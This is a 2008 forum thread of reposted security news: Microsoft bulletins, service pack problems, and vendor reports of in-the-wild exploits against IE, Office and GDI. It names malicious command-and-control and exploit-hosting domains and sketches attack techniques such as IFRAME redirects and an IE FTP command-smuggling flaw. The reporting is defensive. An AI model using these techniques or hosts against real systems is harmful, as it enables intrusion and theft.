February 23, 2008 - "If you use Internet Explorer (versions 6 or 7) to browse the Web, listen up: Criminals are starting to exploit security holes in several widely installed IE plug-ins to plant invasive software when users are coerced or tricked into visiting one of several Web sites. In an alert posted Friday evening, security software vendor Symantec said it is seeing malicious Web sites popping up trying to exploit vulnerabilities in a set of ActiveX controls produced by Aurigma, a technology company whose image transfer browser plug-in is licensed and distributed by a number of major Web sites to help IE users upload pictures. Currently, Facebook.com and MySpace.com are among the biggest distributors of this ActiveX plug-in, but they are hardly the only ones... The malicious Web sites identified by Symantec actually redirects visitors to a fake MySpace.com login page in an attempt to steal MySpace credentials, all while trying the various plug-in exploits quietly in the background... The sites all download a series of executable programs, including some that Symantec said appear to be placeholders for whatever nasties the bad guys want to stuff in there later. The company said it is still in the process of analyzing the programs to see what they do, but it's doubtful they will turn out to be harmless... If you haven't checked out the free, easy-to-use fixit tool* released by incident handlers at the SANS Internet Storm Center, please do so now. The simple, graphical program sets a marker in the Windows registry so that if the vulnerable ActiveX components are installed, then the operating system will not let anyone or anything make use or activate those components... If you ever want to -undo- any part of what (the tool does), run the tool again and uncheck the relevant boxes and hit "set."
* http://isc.sans.org/diary.html?storyid=3931
Last Updated: 2008-02-05 19:48:41 UTC ...(Version: 3)
(Direct link for tool - http://handlers.sans.org/tliston/KillBitGui-Feb08.exe )

:fear:

AplusWebMaster
2008-03-04, 13:58
FYI...

Vista SP1 Survival Guide
- http://www.informationweek.com/shared/printableArticle.jhtml?articleID=205917537
March 4, 2008


.

AplusWebMaster
2008-03-06, 20:41
FYI...

- http://www.microsoft.com/technet/security/Bulletin/MS08-mar.mspx
March 6, 2008 - "...This is an advance notification of -four- security bulletins that Microsoft is intending to release on March 11, 2008..."

Critical (4)

Microsoft Security Bulletin 1
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Office...

Microsoft Security Bulletin 2
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Office....

Microsoft Security Bulletin 3
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Office...

Microsoft Security Bulletin 4
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Office Web Components...


Non-Security, High-Priority Updates on MU, WU, and WSUS
For this month:
• Microsoft is planning to release -two- non-security, high-priority updates on Microsoft Update (MU) and Windows Server Update Services (WSUS).
• Microsoft is planning to release -three- non-security, high-priority updates for Windows on Windows Update (WU) and WSUS.

Note that this information pertains only to non-security, high-priority updates on Microsoft Update, Windows Update, and Windows Server Update Services released on the same day as the security bulletin summary. Information is not provided about non-security updates released on other days..."

AplusWebMaster
2008-03-06, 23:43
FYI...

- http://preview.tinyurl.com/ypjaam
March 6, 2008 (AvertLabs blog) - "Microsoft’s OneCare team issued an update on January 31, 2008 that resulted in SiteAdvisor users receiving a Microsoft warning message recommending that SiteAdvisor be removed due to interference with OneCare... as a general rule, Microsoft recommends running only one security application at a time because of potential performance and “PC stability” issues. We explained to Microsoft that SiteAdvisor functionality is totally unrelated to OneCare. They agreed... there is no need to disable SiteAdvisor or OneCare. The two products co-exist nicely (aside from the pop-up!). Because OneCare doesn’t allow white listing of applications, affected consumers have limited options until all installations of OneCare are patched."

:thud::spider::sick:

AplusWebMaster
2008-03-11, 13:55
FYI...

- http://isc.sans.org/diary.html?storyid=4117
Last Updated: 2008-03-10 23:52:52 UTC - "...We can confirm these attacks and have been tracking several exploits over the last few days. It should be noted that the incidents we are aware of have been limited to a very specific targeted attack and were not widespread. In total, we established approximately 21 reports of attacks using only 8 different files, from within the same two communities, so far... some of the signatures we know of that catch iterations of these attacks. Note that some are relatively generic and catch multiple other exploits as well... Trojan-Dropper.MSExcel.Agent ...We are aware that some of the samples connect back to update-microsoft.kmip.net (221.130.180.87) on port 80, to retrieve the IP address of the actual control server."

> http://www.us-cert.gov/current/#trojan_exploiting_microsoft_excel_vulnerability

- http://blog.trendmicro.com/olympic-fans-may-fall-for-unpatched-ms-excel-vuln/
March 9, 2008 - "XLS files specially designed to exploit a currently unpatched vulnerability in Microsoft Excel (identified as CVE-2008-0081) are reportedly being sent as email attachments in the wild. The attachments, which arrive either as OLYMPIC.XLS or SCHEDULE.XLS are capable of dropping and executing Windows binary executables. This Trojan also drops a non-malicious Excel file and opens it upon execution to trick the user that it is the attached Excel file... Both OLYMPIC.XLS and SCHEDULE.XLS are observed to use similar exploit templates and even allow malware writers to customize the exploit to perform other routines... malware authors are using this window of opportunity to infect a large number of computers. More information on this exploit can be found on this Microsoft Security Advisory*. Trend Micro advises users to be wary of opening unsolicited email messages, much more of files attached to them..."
(Screenshots available at the URL above.)

* http://www.microsoft.com/technet/security/advisory/947563.mspx
January 16, 2008

- http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-0081
Last revised: 1/17/2008

:fear::spider::fear:

AplusWebMaster
2008-03-11, 19:58
FYI...

- http://www.microsoft.com/technet/security/Bulletin/MS08-mar.mspx
March 11, 2008
"...The security bulletins for this month are as follows, in order of severity:

Critical (4)

Microsoft Security Bulletin MS08-014
Vulnerabilities in Microsoft Excel Could Allow Remote Code Execution (949029)
- http://www.microsoft.com/technet/security/bulletin/MS08-014.mspx
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Office...

Microsoft Security Bulletin MS08-015
Vulnerability in Microsoft Outlook Could Allow Remote Code Execution (949031)
- http://www.microsoft.com/technet/security/bulletin/MS08-015.mspx
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Office...

Microsoft Security Bulletin MS08-016
Vulnerabilities in Microsoft Office Could Allow Remote Code Execution (949030)
- http://www.microsoft.com/technet/security/bulletin/MS08-016.mspx
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Office...

Microsoft Security Bulletin MS08-017
Vulnerabilities in Microsoft Office Web Components Could Allow Remote Code Execution (933103)
- http://www.microsoft.com/technet/security/bulletin/MS08-017.mspx
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Office Web Components...


Other Information -
Microsoft Windows Malicious Software Removal Tool
Microsoft has released an updated version of the Microsoft Windows Malicious Software Removal Tool on Windows Update, Microsoft Update, Windows Server Update Services, and the Download Center.

Non-Security, High-Priority Updates on MU, WU, and WSUS
For this month:
• Microsoft has released -two- non-security, high-priority updates on Microsoft Update (MU) and Windows Server Update Services (WSUS).
• Microsoft has released -three- non-security, high-priority updates for Windows on Windows Update (WU) and WSUS.

Note that this information pertains only to non-security, high-priority updates on Microsoft Update, Windows Update, and Windows Server Update Services released on the same day as the security bulletin summary. Information is not provided about non-security updates released on other days..."
--------------------------------------------------------------

ISC Analysis
- http://isc.sans.org/diary.html?storyid=4124
Last Updated: 2008-03-11 18:33:40 UTC
--------------------------------------------------------------

Microsoft Security Advisory (947563)
Vulnerability in Microsoft Excel Could Allow Remote Code Execution
- http://www.microsoft.com/technet/security/advisory/947563.mspx
Published: January 15, 2008 | Updated: March 11, 2008 - "...We have issued MS08-014* to address this issue..."
* http://www.microsoft.com/technet/security/Bulletin/MS08-014.mspx

AplusWebMaster
2008-03-12, 13:22
FYI...

- http://isc.sans.org/diary.html?storyid=4126
Last Updated: 2008-03-11 20:57:53 UTC - "The many out there still using older versions of MSIE (such as Internet Explorer 5 or 6) might well be interested in two new vulnerabilities discovered and made public today on full disclosure. It looks somewhat like a Cross Site Request Forgery (CSRF) attack: A malicious URL you (somehow) hit. It can be unintentional on the user's part through e.g. an injected iframe on a forum. The URL tells the client to contact another server and does some bad things there that the user never intended, but had the authorization to do. The twist in this case is that the second hit doing damage can also be a FTP request, not just a HTTP request. Still normally you can only log in and download (GET) files using a URL, and if the FTP server is requiring authentication, the user or the URL should enter the login/password, tipping them off something strange is going on or the attacker already knowing the credential. That's true, till you see the duo of bugs in IE:
* Apparently IE5 and IE6 allow other commands too, such as deleting files by constructing a URL with %-encoded line-breaks.
* Similarly IE 5 and IE6 allow the URL to be constructed in such a manner as to try to re-authenticate with cached credentials.
IE7 is claimed not to suffer from this, so if you need a bit more incentive to (be allowed to) upgrade, this might just be it."
--------------------------------

- http://preview.tinyurl.com/2at5ub
March 12, 2008 (ComputerWorld) - "A flaw in the way Microsoft's Internet Explorer browser processes FTP commands could let attackers steal or erase data from a victim's FTP site. The bug, which affects users of IE 6 and the unsupported IE 5 browser, gives an attacker a way of hijacking the victim's FTP sessions... "The attack seems viable, but the stars have to be aligned just right for the attack to work," said Craig Schmugar, a researcher with McAfee's Avert Labs..."

('Maybe -not- so difficult...)
- http://www.finjan.com/Content.aspx?id=1367
("Malicious Page of the Month" Feb. 2008 synopsis) - "...deployment of ready-made Crimeware toolkits has gained momentum... When examining a server hosting the latest version of this Crimeware toolkit, we also found an almost unnoticeable standalone application, especially designed to abuse and trade stolen FTP account credentials of legitimate companies around the world. More than 8,700 FTP servers’ credentials of highly respected organizations and enterprises were thus stolen, including valid user names and passwords."
--------------------------------

- http://secunia.com/advisories/29346/
Release Date: 2008-03-12
Impact: Manipulation of data
Where: From remote
Solution Status: Unpatched
Software: MS IE 5.01, MS IE 6.x
...The vulnerability is confirmed in version 6.0.2900.2180 and also reported in version 5. Other versions may also be affected.
Solution: Upgrade to Internet Explorer 7. Do not browse untrusted websites...
--------------------------------

- http://www.securityfocus.com/bid/28208/discuss
"...This issue affects Internet Explorer 5 and 6; prior versions may also be affected..."
- http://www.securityfocus.com/bid/28208/solution
Solution:
Reports indicate that the vendor intends to release a patch that will address this issue...
- http://www.rapid7.com/advisories/R7-0032.jsp
"...Solution
The vendor plans to release a patch for this issue in an upcoming security bulletin. If possible, upgrade to Internet Explorer 7..."

:fear:

AplusWebMaster
2008-03-18, 14:25
FYI...

- http://www.us-cert.gov/current/#microsoft_updates_march_security_bulletin
updated March 17, 2008 - " Microsoft has made revisions to all of the March Security Bulletins. These revisions:
* Clarify why a non-vulnerable version of Office was offered during this update.
* Correct the registry key for verifying the update for ISA Server.
* Remove MS07-015 as a replaced bulletin for Microsoft Office XP Service Pack 3.
* Update vulnerability FAQs
* Update file information tables for Outlook 2000 and 2003.
Microsoft has also re-released MS08-014 to include additional information about issues relating to users of Excel 2003 Service Pack 2 or Service Pack 3..."

:fear:

AplusWebMaster
2008-03-19, 19:46
FYI...

Vista SP1
- http://isc.sans.org/diary.html?storyid=4160
Last Updated: 2008-03-19 17:04:57 UTC ...(Version: 3)
"The first service pack from Microsoft for Vista is out. Please let us know your experiences downloading and applying the 434.5 MB Windows Vista Service Pack 1 Five Language Standalone (KB936330):

MS downloads:
- http://preview.tinyurl.com/ywb4al
"...IF YOU ARE UPDATING JUST ONE COMPUTER: A smaller, more appropriate download is available on Windows Update..."

Update 1: If Vista SP1 will not install, or is not being offered as a option you should read the following article. You may have to update drivers first or other issues...
Windows Vista Service Pack 1 is not available for installation from Windows Update and is not offered by Automatic Updates: http://support.microsoft.com/?kbid=948343

Update 2: Before you install the final release of Windows Vista SP1, you must uninstall any previous releases... http://support.microsoft.com/kb/936330

Windows Service Pack Blocker Tool
- http://technet.microsoft.com/en-us/windowsvista/bb927794.aspx

.

AplusWebMaster
2008-03-20, 01:39
FYI...

- http://blogs.technet.com/msrc/archive/2008/03/19/march-2008-ms08-014-re-release.aspx
March 19, 2008 - "...we've just re-released MS08-014 for Microsoft Office Excel 2003 Service Pack 2 and Service Pack 3 only... The original version released on March 11, 2008 did fully protect against the security issues discussed in the bulletin. However, after release we discovered that the security update caused a calculation error in Microsoft Excel 2003 when a Real Time Data source was used in a user-created Visual Basic for Applications solution (in other words a custom-built VBA function). For additional details, please refer to KB950340*. If you're -not- running Microsoft Excel 2003, this re-release doesn't apply to you and you don't need to take any action. If you are running Microsoft Excel 2003 Service Pack 2 or Service Pack 3, you should use the guidance provided in Knowledge Base article KB950340* to deploy the new update."
* http://support.microsoft.com/kb/950340

:lip:

AplusWebMaster
2008-03-21, 13:18
FYI...

Vista SP1 Chokes On Widely Used Intel Chipset Drivers
- http://www.informationweek.com/shared/printableArticle.jhtml?articleID=206904946
March 20, 2008 - "PCs from Hewlett-Packard, Gateway, Lenovo, and other major computer makers that contain a widely used Intel chipset can't be upgraded to Windows Vista Service Pack 1 if they're running certain drivers. Microsoft has said that Vista SP1 won't work with "a small number of device drivers." The list, however, includes drivers for an Intel chipset that's found in thousands of PCs and laptops. The affected chipset is Intel's 945G Express series, which is used in computers from virtually all major system vendors. It's also found on standalone motherboards sold by Asus. The 945G Express chipset driver versions between numbers 7.14.10.1322 and 7.14.10.1403 won't work with Vista SP1, according to Microsoft. Chipsets provide a connection point for all key subsystems within a PC. The 945G Express chipset includes Intel's GMA 950 graphics core, which also won't work with Vista SP1 if those drivers are used. Microsoft is urging Vista users to update all of their hardware to the latest drivers before even attempting to install SP1... The service pack also won't work with computers that use certain, widely-deployed audio drivers from Realtek and certain drivers for security devices manufactured by Symantec. Microsoft has published a full list of drivers that are incompatible with the service pack*. Meanwhile, Microsoft is continuing to receive reports from computer users who say Vista SP1 is wreaking havoc on their systems..."
* http://support.microsoft.com/?kbid=948343#method5
Last Review: March 20, 2008
Revision: 3.0

('Shades of the XPSP2 installs... 'Like Yogi said, "It's deja vu all over again"...)

:fear:

AplusWebMaster
2008-03-22, 12:47
FYI...

Microsoft Security Advisory (950627)
Vulnerability in Microsoft Jet Database Engine (Jet) Could Allow Remote Code Execution
- http://www.microsoft.com/technet/security/advisory/950627.mspx
March 21, 2008 - "Microsoft is investigating new public reports of very limited, targeted attacks using a vulnerability in the Microsoft Jet Database Engine that can be exploited through Microsoft Word.
Customers running Windows Server 2003 Service Pack 2, Windows Vista, and Windows Vista Service Pack 1 are not vulnerable to the buffer overrun being attacked, as they include a version of the Microsoft Jet Database Engine that is not vulnerable to this issue.
Customers using Microsoft Word 2000 Service Pack 3, Microsoft Word 2002 Service Pack 3, Microsoft Word 2003 Service Pack 2, Microsoft Word 2003 Service Pack 3, Microsoft Word 2007, and Microsoft Word 2007 Service Pack 1 on Microsoft Windows 2000, Windows XP, or Windows Server 2003 Service Pack 1 are vulnerable to these attacks.
Microsoft is investigating the public reports and customer impact. We are also investigating whether the vulnerability can be exploited through additional applications. Upon completion of this investigation, Microsoft will take the appropriate action to help protect our customers..."

- http://secunia.com/advisories/14896/
Last Update: 2008-03-24
Critical: Highly critical
Impact: System access
Where: From remote
Solution Status: Unpatched...
...affects versions of msjet40.dll prior to 4.0.9505.0...

:fear:

AplusWebMaster
2008-03-23, 00:19
FYI...

- http://www.symantec.com/avcenter/threatcon/learnabout.html
(03.22.2008) - "...On March 21, 2008 a public exploit was released for the Microsoft Excel Header Parsing Remote Code Execution Vulnerability (BID 27305). This vulnerability was originally published on January 15, 2008 as an unidentified issue due to reports of targeted exploitation occuring in the wild. It was later patched as part of MS08-014 on March 11, 2008, which addressed a number of different Excel issues.
Microsoft Excel Header Parsing Remote Code Execution Vulnerability
( http://www.securityfocus.com/bid/27305 )
MS08-014 ( http://www.microsoft.com/technet/security/Bulletin/MS08-014.mspx ) This is the first of the issues addressed by MS08-014 to have a public exploit available and therefore will likely see public exploitation in the future. The vulnerability specifically involves an uninitialized stack variable issue which was explained by Microsoft in a recent blog posting:
MS08-014: The Case of the Uninitialized Stack Variable Vulnerability
( http://preview.tinyurl.com/2lw6c6 ) [blogs.technet.com/swi]
At the time of writing we are not aware of any public exploitation incidents involving this exploit, however we are anticipating attacks to occur in the near future. Users are advised to apply the updates available in the MS08-014 bulletin immediately. Those unable to do so are advised to review the workarounds listed in the bulletin and avoid opening Excel documents where possible."

:fear:

AplusWebMaster
2008-03-25, 13:30
RE: http://www.microsoft.com/technet/security/advisory/950627.mspx

- http://isc.sans.org/diary.html?storyid=4192
Last Updated: 2008-03-25 00:41:39 UTC - "...A few minutes ago Microsoft has posted more details about this issue on the MSRC blog*. Summarizing:
- The Jet Database Engine vulnerability is well-known since March 2005. The main issue now is that it can be exploited through a new attack vector, Microsoft Word (specifically two DOC files), avoiding the mitigations enforced by Outlook and Exchange over this unsafe file type (MDB).
- Microsoft is currently working on the fixes, evaluating if an update may prevent Word from opening MDB files, and checking how to apply the fixed msjet40.dll currently available for Windows Server 2003 SP2, Windows Vista, and beta versions of Windows XP SP3 in other OS versions.
- In the meantime, apart from the general recommendation of not opening untrusted MS Word files, you can follow the two workarounds detailed on the initial advisory:
o Computer-based workaround: Restrict the Microsoft Jet Database Engine from running through the "cacls" command, used to modify the access control lists (ACLs) of files. Applications requiring the Jet Database Engine will not function.
o Infrastructure-based workaround: Block specific files at your mail gateway based on string signatures (if it provides file inspection capabilities). The associated strings plus implementation details for specific mail gateways are detailed on the advisory..."
* http://preview.tinyurl.com/2lvatz

AplusWebMaster
2008-03-25, 15:52
FYI...

- http://www.techarp.com/showarticle.aspx?artno=521&pgno=0
20-03-2008 - "...Due to the changes in language releases and Windows XP SP3 RTM's release, here's the updated schedule.

1. Chinese (Simplified), English, French, German, Japanese, Korean, and Spanish...
Second half of April 2008

2. Arabic, Chinese (Hong Kong), Chinese (Traditional), Czech, Danish, Dutch, Finnish, Greek, Hebrew, Hungarian, Italian, Norwegian, Polish, Portuguese (Brazilian), Portuguese (Portugal), Russian, Swedish, and Turkish...
Approximately 21 days after Wave 1 RTM

With the exception of Windows XP Media Center Edition and Windows XP Tablet Edition, Windows XP Service Pack 3 will be released in both standalone and integrated formats. It will be available in both CD and DVD formats, except for the Japanese language version which will only be in DVD format..."

:blink:

AplusWebMaster
2008-03-26, 19:49
FYI...

- http://www.symantec.com/avcenter/threatcon/learnabout.html
(2008.03.26) - "...This issue is now being exploited by a website in the wild. The attack vector that is used differs from what is typically observed for this type of vulnerability. Normally, an attacker will spam Excel files to potential victims so as to leverage the vulnerability. In this case, the exploit is hosted on a site, and the victim is silently redirected to the exploit in a similar strategy to how ActiveX client-side vulnerabilities are exploited. Specifically, the exploit XLS document is hosted in the domain 'lntop.info'. Victims are then redirected to this site through an IFRAME that is embedded in another site... Symantec AntiVirus detects the malicious XLS file as Trojan.Mdropper.AA. Customers are advised to:
- Ensure that antivirus software is up to date.
- Block access to the domain 'lntop.info'.
- Install the updates in the Microsoft Security Bulletin MS08-014."

> http://www.microsoft.com/technet/security/Bulletin/MS08-014.mspx

:fear::spider::fear:

AplusWebMaster
2008-04-01, 22:20
FYI...

- http://preview.tinyurl.com/2szypl
March 31, 2008 (Computerworld) - "...The exploit, which was posted yesterday to the Milw0rm.com Web site, takes advantage of one of two flaws fixed by Microsoft in its MS08-016* security update. Microsoft issued the update on March 11 as part of a four-bulletin batch... "The exploit that is currently available uses a PowerPoint file to leverage the vulnerability on Office XP SP3," said Symantec Corp. analyst Anthony Roe in an alert to customers of the company's DeepSight threat network. "The payload is designed to execute the 'calc.exe' calculator program on Windows. However, it will not be difficult to modify this exploit to add a malicious payload"..."
* http://www.microsoft.com/technet/security/bulletin/ms08-016.mspx?
Revisions:
• V1.0 (March 11, 2008): Bulletin published.
• V1.1 (March 12, 2008): Bulletin updated. FAQ added to clarify the reason why a non-vulnerable version of Office will be offered this update. Also removed MS07-015 as a replaced bulletin for Microsoft Office XP Service Pack 3.
• V1.2 (March 26, 2008): Bulletin updated. Added MS07-025 as a replaced bulletin for Microsoft Office 2003 Service Pack 2.

:fear:

AplusWebMaster
2008-04-03, 23:53
FYI...

- http://www.microsoft.com/technet/security/bulletin/ms08-apr.mspx
April 3, 2008 - "This is an advance notification of -eight- security bulletins that Microsoft is intending to release on April 8, 2008...

Critical (5)

Microsoft Security Bulletin 1
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Office...

Microsoft Security Bulletin 2
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Windows...

Microsoft Security Bulletin 3
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Windows...

Microsoft Security Bulletin 4
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Windows, Internet Explorer...

Microsoft Security Bulletin 5
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution
...The update requires a restart.
Affected Software: Microsoft Windows, Internet Explorer...


Important (3)

Microsoft Security Bulletin 6
Maximum Severity Rating: Important
Impact of Vulnerability: Spoofing
...The update requires a restart.
Affected Software: Microsoft Windows...

Microsoft Security Bulletin 7
Maximum Severity Rating: Important
Impact of Vulnerability: Elevation of Privilege
...The update requires a restart.
Affected Software: Microsoft Windows...

Microsoft Security Bulletin 8
Maximum Severity Rating: Important
Impact of Vulnerability: Remote Code Execution
...The update does -not- require a restart.
Affected Software: Microsoft Office...

---

Microsoft Windows Malicious Software Removal Tool
Microsoft will release an updated version of the Microsoft Windows Malicious Software Removal Tool on Windows Update, Microsoft Update, Windows Server Update Services, and the Download Center.

Non-Security, High-Priority Updates on MU, WU, and WSUS
For information about non-security releases on Windows Update and Microsoft update, please see:

Description of Software Update Services and Windows Server Update Services changes in content for 2008. Includes all Windows content.
- http://support.microsoft.com/kb/894199/en-us

New, Revised, and Released Updates for Microsoft Products Other Than Microsoft Windows.
- http://technet.microsoft.com/en-us/wsus/bb466214.aspx ...

AplusWebMaster
2008-04-08, 01:09
FYI...

- http://preview.tinyurl.com/5omupm
April 7, 2008 (Computerworld) - " Hackers are using a new multiple-attack package composed of seven ActiveX exploits, many of them never seen in the wild before, said a security company on Friday... The attack framework probes Windows PCs for vulnerable ActiveX controls from software vendors Microsoft, Citrix Systems and Macrovision, as well as hardware makers D-Link Corp., Hewlett-Packard, Gateway and Sony... said Symantec researcher Patrick Jungles, who wrote an analysis of the multistrike package for customers of the company's DeepSight threat service. According to Jungles, visitors to compromised Web sites are redirected by a rogue IFRAME to a malicious site serving the package. The attack pack tests the victim's PC for each ActiveX control, detects whether a vulnerable version of a control is installed, and then launches an attack when it finds one... The seven exploited in the package outlined by Jungles are a mix of old and brand-new flaws... Four of the seven ActiveX flaws - those in the D-Link, Gateway, Sony, and Macrovision products - have not been patched, said Jungles... Jungles' report recommended that users apply patches, when they're available, and set the "kill bit" on those ActiveX controls which have not yet been updated by their makers."

:fear::fear:

AplusWebMaster
2008-04-08, 14:33
FYI...

- http://preview.tinyurl.com/3gnxtp
April 07, 2008 (MS Vista blog) - "... The Microsoft Update Blog* contains some important information about updates to the SP1 prerequisite distribution plan. Starting tomorrow, we are resuming the automatic update and installation of the Servicing Stack Update. In mid-April, we will begin distributing SP1 (in the first 5 languages) using the Automatic Update system. We have a lot of Windows users, so not everyone will get it on the same day. In fact, it will go to a small percentage of Windows Vista users each day..."
* http://preview.tinyurl.com/3fdyu2
April 07, 2008 6:12 PM by Microsoft Update Team Blog - "...you may have read that a few customers experienced an endless reboot cycle while installing one of the prerequisites: KB937287**, the Servicing Stack Update (SSU), which contains the Service Pack 1 installation program. As posted last month on the Windows Vista blog, we suspended automatic distribution of the SSU while we investigated the problem. Over the past few weeks, we’ve learned a lot more about the problem and have taken steps to address the issue. Today, we’d like to let you know that we are resuming automatic distribution of the SSU tomorrow and provide more clarity on what happened.
To clear up any concerns for those of you who have already installed the update: There is no problem with the files that make up the Servicing Stack Update (KB937287**); the problem some customers encountered was with the installation process for the update. That means if you already have the update installed, you do not need to uninstall it or install the rereleased version of the update.
- So what caused the problem? Well, the SSU has special code to check whether there are any pending reboots or other updates to install. If it sees either of these circumstances, it prevents the install from starting. During our investigation, we discovered that there were a few unknown and rare events during the middle of the installation of the update that could cause the update to think it needed a reboot to complete the installation. If this happened, the system entered a repeating reboot loop.
To address this problem for people who have not already installed the SSU, we are releasing a fix tomorrow which will install prior to the SP1 Servicing Stack Update. This pre-SSU update helps to ensure a smooth install of the SSU by working to prevent the system from rebooting during the SP1 SSU installation. We also made additional changes to the SSU installer code, so that it checks for and requires the pre-SSU (KB949939) before it will install. These two updates should now install seamlessly through Windows Update, in the proper order, so those of you with WU set to “install updates automatically” who haven’t already installed the SSU don’t have to take any further action..."
** http://support.microsoft.com/kb/937287

.

AplusWebMaster
2008-04-08, 21:30
FYI...

- http://www.microsoft.com/technet/security/Bulletin/MS08-apr.mspx
April 8, 2008 - "This bulletin summary lists security bulletins released for April 2008...

Critical (5)

Microsoft Security Bulletin MS08-018
Vulnerability in Microsoft Project Could Allow Remote Code Execution (950183)
- http://www.microsoft.com/technet/security/Bulletin/MS08-018.mspx
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Office...

Microsoft Security Bulletin MS08-021
Vulnerabilities in GDI Could Allow Remote Code Execution (948590)
- http://www.microsoft.com/technet/security/Bulletin/MS08-021.mspx
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Windows...

Microsoft Security Bulletin MS08-022
Vulnerability in VBScript and JScript Scripting Engines Could Allow Remote Code Execution (944338)
- http://www.microsoft.com/technet/security/Bulletin/MS08-022.mspx
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Windows...

Microsoft Security Bulletin MS08-023
Security Update of ActiveX Kill Bits (948881)
- http://www.microsoft.com/technet/security/Bulletin/MS08-023.mspx
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Windows. Internet Explorer...

Microsoft Security Bulletin MS08-024
Cumulative Security Update for Internet Explorer (947864)
- http://www.microsoft.com/technet/security/Bulletin/MS08-024.mspx
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Windows. Internet Explorer...


Important (3)

Microsoft Security Bulletin MS08-020
Vulnerability in DNS Client Could Allow Spoofing (945553)
- http://www.microsoft.com/technet/security/Bulletin/MS08-020.mspx
Maximum Severity Rating: Important
Impact of Vulnerability: Spoofing...
Affected Software: Microsoft Windows...

Microsoft Security Bulletin MS08-025
Vulnerability in Windows Kernel Could Allow Elevation of Privilege (941693)
- http://www.microsoft.com/technet/security/Bulletin/MS08-025.mspx
Maximum Severity Rating: Important
Impact of Vulnerability: Elevation of Privilege...
Affected Software: Microsoft Windows...

Microsoft Security Bulletin MS08-019
Vulnerabilities in Microsoft Visio Could Allow Remote Code Execution (949032)
- http://www.microsoft.com/technet/security/Bulletin/MS08-019.mspx
Maximum Severity Rating: Important
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Office...

---------------------------------------

ISC Analysis
- http://isc.sans.org/diary.html?storyid=4264
Last Updated: 2008-04-08 17:42:25 UTC

AplusWebMaster
2008-04-11, 01:02
FYI...

- http://isc.sans.org/diary.html?storyid=4274
Last Updated: 2008-04-10 21:20:25 UTC - "It appears that Symantec has raised the Threatcon to Level 2 this afternoon...
- http://www.symantec.com/security_response/threatcon/index.jsp
'...The DeepSight honeynet has observed in-the-wild exploit attempts targeting a GDI vulnerability patched by Microsoft on April 8, 2008. The malicious image appears to target the Microsoft Windows GDI Stack Overflow Vulnerability (BID 28570). At least three different sites are hosting the images; two different malicious binaries are associated with the attacks. Analysis of the images has shown that although they appear to be malicious, they do not contain enough data in the associated image property to sufficiently trigger the vulnerability. We are still investigating as to why this may be the case. Users are advised to apply the MS08-021* patches immediately. These attack attempts highlight the severity of this issue -- it is only a matter of time before new images that successfully trigger the issue are observed in the wild... some of the associated malware that is delivered with the attack is not detected...'
* http://www.microsoft.com/technet/security/Bulletin/MS08-021.mspx
(Microsoft Security Bulletin MS08-021 – Critical
Vulnerabilities in GDI Could Allow Remote Code Execution (948590)
Published: April 8, 2008 ...)
...If you haven't already patched do so now and don't forget to remind your users not to open image files."
---------------------------------------------------

Exploiting Latest GDI Vulnerability Found in the Wild
- http://preview.tinyurl.com/4nkzn8
April 10, 2008 (Symantec Security Response Weblog) - "...It is possible that these exploits either have been leaked and are "in-work" copies, or that they are functional on some platform that we have not tested. However, the exploit (named "top.jpg") does contain functional payload, which downloads a secondary file (word.gif). Word.gif is really an executable that would be run following a successful infection. Its main function would be to use iexplore.exe to contact a few hosts in China, presumably to download additional malicious code..."

:fear::fear:

AplusWebMaster
2008-04-11, 18:47
FYI...

April 2008 - Black Tuesday Overview
- http://isc.sans.org/diary.html?storyid=4264
Last Updated: 2008-04-11 13:59:44 UTC
"...
MS08-021 ...Symantec has reported non-working exploits in the wild...
- http://www.symantec.com/security_response/threatcon/index.jsp
"...Users are advised to apply the MS08-021 patches immediately. These attack attempts highlight the severity of this issue -- it is only a matter of time before new images that successfully trigger the issue are observed in the wild..."

MS08-023 ...PoC exploits were posted on the internet...
( 3rd party killbit for Yahoo! Music Jukebox activeX control )

:fear:

AplusWebMaster
2008-04-12, 14:55
FYI...

Elevated ATLAS Threat Index - GDI Exploits in the Wild
- http://asert.arbornetworks.com/2008/04/elevated-atlas-threat-index-gdi-exploits-in-the-wild/
April 11, 2008 - "The ATLAS Threat Index is used to track global security issues as a barometer, and we’re raising the index (something we don’t do very often). We are doing so because see evidence that the GDI vulnerability - MS08-021 - is being exploited in the wild. We have not yet seen widespread attacks, but we anticipate that this attack vector will grow in popularity in the coming days, similar to the WMF and ANI attack vectors in the past couple of years..."

- http://www.us-cert.gov/current/#active_exploitation_of_gdi_vulnerabilities
April 11, 2008 - "US-CERT is following public reports indicating that attackers are attempting to exploit vulnerabilities in GDI. These vulnerabilities are due to buffer overflow conditions that exist in the processing of EMF and WMF image files. By convincing a user to open a specially crafted EMF or WMF file, a remote attacker may be able to execute arbitrary code. These vulnerabilities were addressed in Microsoft Security Bulletin MS08-021. Users who have not applied this patch are vulnerable..."

:fear:

AplusWebMaster
2008-04-16, 05:32
FYI...

- http://isc.sans.org/diary.html?storyid=4264
Last Updated: 2008-04-16 01:23:53 UTC ...(Version: 5)
